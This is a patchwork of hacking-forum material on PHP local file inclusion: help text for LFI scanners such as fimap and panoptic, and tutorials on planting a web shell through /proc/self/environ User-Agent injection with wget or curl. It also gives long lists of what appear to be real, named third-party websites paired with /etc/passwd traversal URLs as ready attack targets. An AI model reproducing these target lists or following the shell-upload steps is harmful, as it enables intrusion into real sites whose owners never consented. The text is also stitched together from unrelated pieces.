Exploitation

./liffy --url http://target/vuln/file.php?= --data

http-server /tmp -p 8000

msfconsole -r php_listener.rc

curl --silent http://target/vuln/7ka0tqsq.php

Help Menu

Usage: panoptic.py --url TARGET [options]

Options:
  -h/--help             show this help message and exit
  -v/--verbose          display extra output information
  -u/--url=URL          set target URL
  -p/--param=PARAM      set parameter name to test for (e.g. "page")
  -d/--data=DATA        set data for HTTP POST request (e.g. "page=default")
  -t/--type=TYPE        set type of file to look for ("conf" or "log")
  -o/--os=OS            set filter name for OS (e.g. "*NIX")
  -s/--software=SOFT..  set filter name for software (e.g. "PHP")
  -c/--category=CATE..  set filter name for category (e.g. "FTP")
  -l/--list=GROUP       list available filters for group (e.g. "software")
  -a/--auto             avoid user interaction by using default options
  -w/--write-files      write content of retrieved files to output folder
  -x/--skip-parsing     skip special tests if *NIX passwd file is found
  --ignore-proxy        ignore system default HTTP proxy
  --proxy=PROXY         set proxy (e.g. "socks5://192.168.5.92")
  --user-agent=UA       set HTTP User-Agent header value
  --random-agent        choose random HTTP User-Agent header value
  --cookie=COOKIE       set HTTP Cookie header value (e.g. "sid=foobar")
  --header=HEADER       set a custom HTTP header (e.g. "Max-Forwards=10")
  --prefix=PREFIX       set prefix for file path (e.g. "../")
  --postfix=POSTFIX     set postfix for file path (e.g. "")
  --multiplier=MULTI..  set multiplication number for prefix (e.g. 10)
  --bad-string=STRING   set a string occurring when file is not found
  --replace-slash=RE..  set replacement for char / in paths (e.g. "/././")
  --update              update Panoptic from official repository

Examples

./panoptic.py --url "http://localhost/lfi.php?file=test.txt"
./panoptic.py --url "http://localhost/lfi.php?file=test.txt&id=1" --param file
./panoptic.py --url "http://localhost/lfi.php" --data "file=test.txt&id=1" --param file

./panoptic.py --list software
./panoptic.py --list category
./panoptic.py --list os

./panoptic.py -u "http://localhost/lfi.php?file=test.txt" --os Windows
./panoptic.py -u "http://localhost/lfi.php?file=test.txt" --software WAMP

There are many methods to exploit Local File Inclusion (LFI) of a vulnerability PHP web application in Linux systems. Some of them are invalid in the latest version of Linux distributions, I think. For example, those methods are processes injection, log files injection, session files injection and etc.



Unfortunately, in my recently research, I find out that PHP session files of CentOS 6.3 (maybe applied for previous versions) in default settings can be injected and loaded. However, Ubuntu 12.04 cannot. (Remarks : I did not check the other Linux distributions for this research.)



When the PHP session files can be injected and loaded along with LFI vulnerability, a remote shell can be obtained by attackers.



Basically, CentOS is a clone of RedHat Enterprise Linux.



Reference : Web vulnerabilities to gain access to the system



That's all! See you.

What works currently?

• Check a Single URL, List of URLs, or Google results fully automaticly.
• Can identify and exploit file inclusion bugs.
• Relative\Absolute Path Handling.
• Tries automaticly to eleminate suffixes with Nullbyte and other methods like Dot-Truncation.
• Remotefile Injection.
• Logfile Injection. (FimapLogInjection)
• Test and exploit multiple bugs:
• include()
• include_once()
• require()
• require_once()
• You always define absolute pathnames in the configs. No monkey like redundant pathes like:
• ../etc/passwd
• ../../etc/passwd
• ../../../etc/passwd
• Has a Blind Mode (--enable-blind) for cases when the server has disabled error messages. BlindMode
• Has an interactive exploit mode which...
• ...can spawn a shell on vulnerable systems.
• ...can spawn a reverse shell on vulnerable systems.
• ...can do everything you have added in your payload-dict inside the config.py
• Add your own payloads and pathes to the config.py file.
• Has a Harvest mode which can collect URLs from a given domain for later pentesting.
• Goto FimapHelpPage for all features.
• Works also on windows.
• Can handle directories in RFI mode like:
• where Null-Byte is not possible.
• Can use proxys.
• Scans and exploits GET, POST and Cookies.
• Has a very small footprint. (No senseless bruteforcing of pathes - unless you need it.)
• Can attack also windows servers! (WindowsAttack)
• Has a tiny plugin interface for writing exploitmode plugins (PluginDevelopment)
• Check out the PHPInfo() Exploit plugin: FimapPhpInfoExploit
• Non Interactive Exploiting (FimapNonInteractiveExec)

Download -
fimap_alpha_v09.tar.gz

Source -
http://code.google.com/p/fimap/


fimap v.09_svn:: Automatic LFI/RFI scanner and exploiter:: by Iman Karim (fimap.dev@gmail.com)
Usage: ./fimap.py [options]
## Operating Modes:
   -s , --single                 Mode to scan a single URL for FI errors.
                                 Needs URL (-u). This mode is the default.
   -m , --mass                   Mode for mass scanning. Will check every URL
                                 from a given list (-l) for FI errors.
   -g , --google                 Mode to use Google to aquire URLs.
                                 Needs a query (-q) as google search query.
   -H , --harvest                Mode to harvest a URL recursivly for new URLs.
                                 Needs a root url (-u) to start crawling there.
                                 Also needs (-w) to write a URL list for mass mode.
## Techniques:
   -b , --enable-blind           Enables blind FI-Bug testing when no error messages are printed.
                                 Note that this mode will cause lots of requests compared to the
                                 default method. Can be used with -s, -m or -g.
   -D , --dot-truncation         Enables dot truncation technique to get rid of the suffix if
                                 the default mode (nullbyte poison) failed. This mode can cause
                                 tons of requests depending how you configure it.
                                 By default this mode only tests windows servers.
                                 Can be used with -s, -m or -g. Experimental.
   -M , --multiply-term=X        Multiply terminal symbols like '.' and '/' in the path by X.
## Variables:
   -u , --url=URL                The URL you want to test.
                                 Needed in single mode (-s).
   -l , --list=LIST              The URL-LIST you want to test.
                                 Needed in mass mode (-m).
   -q , --query=QUERY            The Google Search QUERY.
                                 Example: 'inurl:include.php'
                                 Needed in Google Mode (-g)
        --skip-pages=X           Skip the first X pages from the Googlescanner.
   -p , --pages=COUNT            Define the COUNT of pages to search (-g).
                                 Default is 10.
        --results=COUNT          The count of results the Googlescanner should get per page.
                                 Possible values: 10, 25, 50 or 100(default).
        --googlesleep=TIME       The time in seconds the Googlescanner should wait befor each
                                 request to google. fimap will count the time between two requests
                                 and will sleep if its needed to reach your cooldown. Default is 5.
   -w , --write=LIST             The LIST which will be written if you have choosen
                                 harvest mode (-H). This file will be opened in APPEND mode.
   -d , --depth=CRAWLDEPTH       The CRAWLDEPTH (recurse level) you want to crawl your target site
                                 in harvest mode (-H). Default is 1.
   -P , --post=POSTDATA          The POSTDATA you want to send. All variables inside
                                 will also be scanned for file inclusion bugs.
        --cookie=COOKIES         Define the cookie which should be send with each request.
                                 Also the cookies will be scanned for file inclusion bugs.
                                 Concatenate multiple cookies with the ';' character.
        --ttl=SECONDS            Define the TTL (in seconds) for requests. Default is 30 seconds.
        --no-auto-detect         Use this switch if you dont want to let fimap automaticly detect
                                 the target language in blind-mode. In that case you will get some
                                 options you can choose if fimap isnt sure which lang it is.
        --dot-trunc-min=700      The count of dots to begin with in dot-truncation mode.
        --dot-trunc-max=2000     The count of dots to end with in dot-truncation mode.
        --dot-trunc-step=50      The step size for each round in dot-truncation mode.
        --dot-trunc-ratio=0.095  The maximum ratio to detect if dot truncation was successfull.
        --dot-trunc-also-unix    Use this if dot-truncation should also be tested on unix servers.
## Attack Kit:
   -x , --exploit                Starts an interactive session where you can
                                 select a target and do some action.
   -T , --tab-complete           Enables TAB-Completation in exploit mode. Needs readline module.
                                 Use this if you want to be able to tab-complete thru remote
                                 files\dirs. Eats an extra request for every "cd" command.
## Disguise Kit:
   -A , --user-agent=UA          The User-Agent which should be sent.
        --http-proxy=PROXY       Setup your proxy with this option. But read this facts:
                                   * The googlescanner will ignore the proxy to get the URLs,
                                     but the pentest\attack itself will go thru proxy.
                                   * PROXY should be in format like this: 127.0.0.1:8080
                                   * Its experimental
        --show-my-ip             Shows your internet IP, current country and user-agent.
                                 Useful if you want to test your vpn\proxy config.
## Plugins:
        --plugins                List all loaded plugins and quit after that.
   -I , --install-plugins        Shows some official exploit-mode plugins you can install 
                                 and\or upgrade.
## Other:
        --update-def             Checks and updates your definition files found in the
                                 config directory.
        --test-rfi               A quick test to see if you have configured RFI nicely.
        --merge-xml=XMLFILE      Use this if you have another fimap XMLFILE you want to
                                 include to your own fimap_result.xml.
   -C , --enable-color           Enables a colorful output. Works only in linux!
   -v , --verbose=LEVEL          Verbose level you want to receive.
                                 LEVEL=3 -> Debug
                                 LEVEL=2 -> Info(Default)
                                 LEVEL=1 -> Messages
                                 LEVEL=0 -> High-Level
        --credits                Shows some credits.
        --greetings              Some greetings ;)
   -h , --help                   Shows this cruft.
## Examples:
  1. Scan a single URL for FI errors:
        ./fimap.py -u 'http://localhost/test.php?file=bang&id=23'
  2. Scan a list of URLS for FI errors:
        ./fimap.py -m -l '/tmp/urllist.txt'
  3. Scan Google search results for FI errors:
        ./fimap.py -g -q 'inurl:include.php'
  4. Harvest all links of a webpage with recurse level of 3 and
     write the URLs to /tmp/urllist
        ./fimap.py -H -u 'http://localhost' -d 3 -w /tmp/urllist

lfimap - This script is used to take the highest beneficts of the local file include vulnerability in a webserverThis script can -

• Find lfi vulnerability in each parameter automatically
• Find the root of the file system automatically 
• Find default files inside the server in linux and windows
• Find passwords in config files
• Support basic authentication
• Send null bytes to bypass some controls
• Write a report of the scan
• Support proxy
• Detect OS and send only test according the OS detected 
• Hexaencode support
• Output in html format

A small and simple but working LFI Scanner. Written in Perl. Did this because of the sake of codegrasm :p. I might remake this scrap and merge this with LaFuzz.

Download - bunny-v1.0.gz

Command-line accessGet a local copy of the bunny-pl repository with this command:
git clone https://code.google.com/p/bunny-pl/

Visit website -
http://code.google.com/p/bunny-pl/

Screenshot -

• Please read this Reminders before process to download. 

I previously covered how to exploit LFI vulnerabilities with FIMAP but have received some questions from folks due to FIMAP not always picking the injection points up. Automated tools are nice but if you don’t know how to do it manually then you can miss a lot of possible vulnerabilities and opportunities you can leverage to exploit your target (plus its good to know what goes on behind the scenes). Today I am going to show you how to perform LFI exploitation through the /proc/self/environ method. Here goes…

OK, so first we walk through our site and we notice a link which seems to be referencing another document on the server. This is a good place to start investigating potential LFI vulnerabilities.
http://www.site.com/index.php
HomePage>>Click on "Contact Us">>
http://www.site.com/index.php?page=contact.php&title=ContactUs
NOTE: page= appears to reference to another document on server (in this case contacts.php)


Let us see what happens if we replace the standard link with some arbitrary data:
http://www.site.com/index.php?page=1


Now let us try to reference a real document which we know to be on all unix machines, /etc/passwd:


Voila! We can read the /etc/passwd file through LFI! This is good, but now we need to check to see if /proc/self/environ is accessible. If it is we can leverage it to get a shell on the target site. If it is not then we will need to further investigate which files we can access and then see if we can inject into any of them. I will only be focusing on the /proc/self/environ method for now, but may write another follow up in future to cover some of the other methods which can be used for LFI takeover. OK, so now we check for existance of /proc/self/environ:


NOTE the “DOCUMENT_ROOT=[VALUE]” on the returned page. This is the key indicator that we have access to the /proc/self/environ which we can now leverage to put a shell on the target site. We will accomplish this by injecting our PHP code into the User Agent field when we request this file again. Due to the way this is processed it will inject our code and then we can use to further escalate priveleges. We will now inject this code into our page request for /proc/self/environ and refresh the page.

Inject PHP code in UA field, like one of these:


We can now read the results of any of the commands we pass through in the User-Agent field, it will look similar to this:

ID:


UNAME:


UPLOAD SHELL WITH WGET:
OR
UPLOAD SHELL WITH CURL:




NOTE: to inject the code into the User-Agent field you will need a add-on for your browser such as Live HTTP Headers, Tamper Data, or Burp Suite.

Once our code is injected we simply navigate to the webshell we just uploaded, should be located in site.com/shell.php unless you instructed it to go elsewhere when you used your WGET or CURL command for shell download. If your lucky when you go to your shell you will be greeted with something similar to this:


Now that you have a shell on the site you are fairly free to do what you want I hope you have enjoyed another brief tutorial on LFI. I will try to work on follow up articles covering Log Injection methd and one or two other methods which can be used when the conditions are just right.

Special shout out to user DownFall. for the LFI leads!

Greets to Zer0Lulz crew!

Until next time, enjoy!

http://www.winnerspizza.com/index.php?page=/etc/passwd
http://oregon-airsoft.com/index.php?page=/etc/passwd
http://www.eyesonmain.ca/index.php?page=/etc/passwd
http://www.tottenfarms.com/index.php?page=/etc/passwd
http://www.rtscom.com/index.php?page=/etc/passwd
http://www.lavieillefrance.fr/index.php?page=/etc/passwd
http://www.evoca.ch/index.php?page=../etc/passwd
http://estaminetlille.fr/vieille/index.php?page=/etc/passwd
http://www.traildumont.be/index.php?page=/etc/passwd&album=12
http://www.speakingfromtheheartinc.com/index.php?page=/etc/passwd
http://www.moto-plus.net/index.php?Page=../../../../../etc/passwd
http://www.maxparts.ru/index.php?page=/etc/passwd
http://www.focusfloors.co.za/?page=../../../../etc/passwd
http://www.bushboats.co.za/index.php?page=../../../../etc/passwd
http://www.creteform.com/index.php?page=/etc/passwd&PHPSESSID=null
http://www.dreisingerfuneralhome.com/index.php?page=../../../../../etc/passwd
http://www.iceclub.biz/index.php?page=../../../../etc/passwd
http://www.daybororuralfire.com.au/index.php?page=/etc/passwd
http://www.spcstamps.com/index.php?page=/etc/passwd&back=null
http://www.ninaal.pl/index.php?page=../etc/passwd
http://www.tempelwelt.de/index.php?page=../../../../etc/passwd&PHPSESSID=null
http://www.mescreations.fr/index.php?page=../../../../etc/passwd
http://www.death-star.net/index.php?Page=/etc/passwd&Mode=MDP
http://www.scoberbernbach.de/index.php?page=/etc/passwd
http://lomejordehuelva.com/index.php?page=/etc/passwd
http://pomestam24.ru/index.php?page=/etc/passwd&option=login
http://www.kaltimmethanol.com/indo/index.php?page=/etc/passwd
http://winnerspizza.com/index.php?page=/etc/passwd
http://timslist.com/utechtube/index.php?page=/etc/passwd
http://www.fuw.edu.pl/~trawinski/index.php?page=/etc/passwd
http://www.memorial-odlozil.cz/odlozil/index.php?page=/etc/passwd
http://maxponomarenko.ru/index.php?page=/etc/passwd
http://shotgun.cc/index.php?page=/etc/passwd
http://www.fair-wohnen.de/index.php?page=../../../../../../etc/passwd
http://jhcs.eu/index.php?folder=Kontakt&page=../../../../../etc/passwd
http://www.rheuma-liga.selbsthilfe-wue.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.hamann-lege.de/index.php?page=/etc/passwd
http://www.ulmer-verein.de/uv/index.php?page=/etc/passwd
http://proimmo360.com/index.php?page=/etc/passwd
http://www.lelo.biz/index.php?name=Kontakt&page=/etc/passwd&items=4
http://www.misbrugscenterherning.dk/index.php?page=../../../../../etc/passwd
http://www.wti-juelich.de/index.php?page=/etc/passwd
http://www.sekoro.seko-bayern.org/index.php?page=/etc/passwd
http://www.immobilieninvest.at/index.php?page=/etc/passwd&PHPSESSID=null
http://www.lc-bensberg-schloss.de/index.php?page=../../../../../../../../etc/passwd
http://www.ingolstadt.muetterzentren-bayern.de/index.php?page=/etc/passwd
http://www.tendokarate.no/index.php?page=/etc/passwd
http://www.mstechnical.pl/de/index.php?page=/etc/passwd
http://www.k-turm.de/index.php?page=/etc/passwd
http://wsc-skiextreme.wir-und-ich.de/index.php?page=../../../etc/passwd
http://www.seniorenbueros-bayern.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.bodyworld-schkeuditz.de/index.php?page=/etc/passwd
http://www.fortschrittwuerzburg.selbsthilfe-wue.de/index.php?page=/etc/passwd&titel=Kontakt
http://www.spielmannszug-ffw-oberkotzau.de/index.php?page=/etc/passwd
http://proimmo360.com/index.php?page=/etc/passwd
http://www.grabowscy.com/index.php?page=/etc/passwd
http://www.heilpraxis-geissdoerfer.de/index.php?page=/etc/passwd
http://www.selfclean.de/index.php?page=/etc/passwd
http://www.ninaal.pl/index.php?page=../etc/passwd
http://www.cncmodel.pl/eng/index.php?page=/etc/passwd
http://walk-in-the-park.de/index.php?page=/etc/passwd
http://www.k-tower.eu/index.php?page=/etc/passwd
http://dorfschuetzen.de.dedi926.your-server.de/index.php?page=/etc/passwd&PHPSESSID=null
http://www.ma2da.de/index.php?page=/etc/passwd
http://www.frauentreff-welden.de/index.php?page=/etc/passwd
http://etechnik-wichmann.de/index.php?page=../../../../etc/passwd
http://www.erotik-als-lebenskraft.de/index.php?page=/etc/passwd
http://84388.webhosting28.1blu.de/huchbaumanagement/index.php?page=/etc/passwd
http://www.stotterer-selbsthilfe-regensburg.seko-bayern.org/index.php?page=/etc/passwd
http://www.muezeger.de/index.php?page=/etc/passwd
http://schlafapnoe.selbsthilfe-wue.de/index.php?page=/etc/passwd
http://www.hctjstbk.cz/index.php?page=/etc/passwd
http://violetta-tradgard.se/index.php?page=/etc/passwd
http://www.sdhpardubice.cz/index.php?page=/etc/passwd
http://www.osteoporose.selbsthilfe-wue.de/index.php?page=/etc/passwd
http://www.die-drid.de/index.php?mod=kontaktmenu.php&page=/etc/passwd

http://www.friocam.com.ar/index.php?page=/proc/self/environ
http://www.bilbobusca.com/index.php?page=/etc/passwd
http://www.coyotes.com.mx/newsite/index.php?page=/etc/passwd
http://www.dondebuscar.net/index.php?page=/etc/passwd
http://www.valprop.cl/index.php?page=/proc/self/environ
http://www.esctrategas.com.ar/index.php?page=/proc/self/stat
http://www.asientoshm.com/index.php?page=/proc/self/environ
http://www.kinleiner.com.ar/index.php?page=/proc/self/stat
http://www.arapongao.com/index.php?page=/etc/passwd
http://www.twiconsultoria.com.br/index.php?page=/etc/passwd
http://www.bypaty.com/2010/index.php?page=/etc/passwd
http://www.fjpmedia.com/index.php?page=../../../../etc/passwd
http://www.top-blagues.net/index.php?page=/etc/passwd
http://www.laurent.cobraiville.fr/index.php?page=/etc/passwd
http://www.prodisney.ru/index.php?page=/etc/passwd
http://www.wopthai.org/index.php?page=/etc/passwd
http://www.greenlemonband.com/index.php?page=/etc/passwd
http://www.5degrees.de/index.php?page=/etc/passwd&java=1
http://www.estaminetlille.fr/auvieux/index.php?page=/etc/passwd
http://www.lavieillefrance.fr/index.php?page=/etc/passwd
http://www.lpr-andrecitroen-marly.fr/index.php?page=/proc/self/environ
http://www.msap.centre-de-ressources.fr/index.php?page=/proc/self/environ
http://www.jadeimmo.fr/index.php?page=/etc/passwd
http://www.edus.nstru.ac.th/anuban/index.php?page=/etc/passwd
http://www.traildumont.be/index.php?page=/proc/self/stat
http://www.asientoshm.com/index.php?page=/proc/self/environ

Hey guys, today I'm going to be going over a brief tutorial on what LFI is, and how to use it to get shell access.

LFI stands for Local File Inclusion, which gives you access to read files on a server through your web browser.





A vulnerable link looks something like this:

Here's what the code looks like that makes it vulnerable.

First off, you're going to need a few things.

1. FireFox
2. Tamper Data
3. Vulnerable Sites

Here's a few threads with vulnerable links.
LFI Sites #1
LFI Sites #2
LFI Sites #3
LFI Sites #4
LFI Sites #5
LFI Sites #6

If you can't find any good ones from those lists, use google dorks to find some.
Here's a few dorks.


I'm going to be showing you how to exploit LFI and get your shell uploaded via /proc/self/environ

So after you got your site, try checking if you can access /etc/passwd.

Your page should come up with something that looks like this.

Good, now we know that site is vulnerable.

Now we need to check for /proc/self/environ

So change your path to /proc/self/environ

Your page should look something like this if the file exists, not all sites have it.

The part we're interested in, is the HTTP_USER_AGENT. We're going to change our user agent to try and get data from the site by injecting code where our browsers user agent should be.

To do this, we're going to use tamperdata. Once you have it installed, go to your options, and go down into TamperData.


Now you should have a window that looks like this.

So your page should still be /proc/self/environ
Click Start Tamper, and refresh your page.

We're going to try some code injection.

After you start tampering, you should see a window that looks something like this:

In the User-Agent field, type:

Now when your site is down loading, you should get an image that looks something like this if you did it correctly.


Now we know we can execute code, so let's get our shell uploaded using wget.

Open TamperData again, click start tamper, and refresh your site. This time, on the User-Agent enter this:

It should look like this:


This downloads that text file, and renames it as a php file (your shell).

You can upload your shell as a text file using free webhosting...I already shelled a site, so I'm gonna use that site as file hosting.

Once you're done with that, you can try and access your shell directly by going to site/shell.php

If you get an error, try using the same method as when you got your vulnerable link.
Example:


Load your shell by using the same method.


If it loads fine the second time, you can upload a file using your shell to directly access it.

When you're all done, you have a sexy shell, kinda like this :3

Alternate Methods
Sometimes sites will take extra precaution to prevent attacks like these.
Here is an alternate method.

Change your user agent to:


Now load your url as:

So your url should look like:


Now hopefully you got around it, and got your shell uploaded.
Special thanks to Hooded Robin for all the help he's given me with LFI.
I recommend you take a look at his video tutorial using Burp Suite.
You can check it out Here
Thanks alot <3

If you guys need anything, post here or feel free to PM me. I'll get back to you as soon as I can.

Filter Evasion

As you know, some sites have Web Application Firewalls, or WAFs installed. In order to bypass these, here's a few techniques you can try.

Null Bytes

Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.

Example:


It's pretty basic.

URL Encoding.

Here's another method, url encoding.

Encode your slashes, or unallowed characters to bypass these.



-DownFall

http://www.filllpg.co.uk/index.php?page=/etc/passwd
http://www.bayoutitansbooster.com/index.php?page=/etc/passwd
http://www.alinholding.com/index.php?page=/etc/passwd&page_title=home
http://diuf.unifr.ch/pai/education/2006_2007/ca/index.php?page=/etc/passwd&subpage=/etc/passwd
http://lyantndc.cluster010.ovh.net/index.php?page=/etc/passwd
http://mspierphoto.com/index.php?page=/etc/passwd
http://www.tottenfarms.com/index.php?site=1&page=/etc/passwd
http://www.sohnidharti.tv/main/Urdu/index.php?page=/etc/passwd
http://www.crsfsite.net/main/index.php?page=/etc/passwd
http://www.expo-ingenieurs.be/index.php?lang=FR&page=/etc/passwd
http://www.lovium.nl/index.php?page=/etc/passwd
http://www.death-star.net/index.php?Page=/etc/passwd
http://www.f-a-t.de/fat_v1/index.php?lang_id=2&page=/etc/passwd